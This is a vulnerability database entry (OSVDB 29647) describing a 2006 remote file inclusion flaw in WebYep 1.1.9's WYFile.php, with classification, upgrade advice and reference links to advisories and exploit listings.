Info

Disclosure

Oct 09, 2006

Discovery

Oct 05, 2006

Dates

Exploit

Unknown

Solution

Unknown

Description

Webyep contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to WYFile.php not properly sanitizing user input supplied to the webyep_sIncludePath variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Classification

Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Exploit Public
Disclosure: Vendor Verified
OSVDB: Web Related

Solution

Upgrade to version 1.1.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Products

Webyep

WebYep

1.1.9

References

Security Tracker: 1017023
CVE ID: 2006-5220 (see also: NVD)
Bugtraq ID: 20406
Secunia Advisory ID: 22336
Milw0rm: 2496
Exploit Database: 2496
ISS X-Force ID: 29397
Related OSVDB ID: 29643 29644 29645 29646 29647 29648 29649 29650 29651 29652 29653 29654 29655 29656 29657 29658 29659 29660 29661 29662 29663
VUPEN Advisory: ADV-2006-3972
Keyword: ECHO_ADV_48$2006
Other Advisory URL: http://advisories.echo.or.id/adv/adv48-theday-2006.txt
http://securityreason.com/securityalert/1702
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0113.html
http://www.securityfocus.com/archive/1/archive/1/448009/100/0/threaded
Vendor URL: http://www.obdev.at/
Vendor Specific News/Changelog Entry: http://www.obdev.at/products/webyep/release-notes.html

Credit

the_day - the_dayecho.or.id -

Direct URL: http://osvdb.org/29647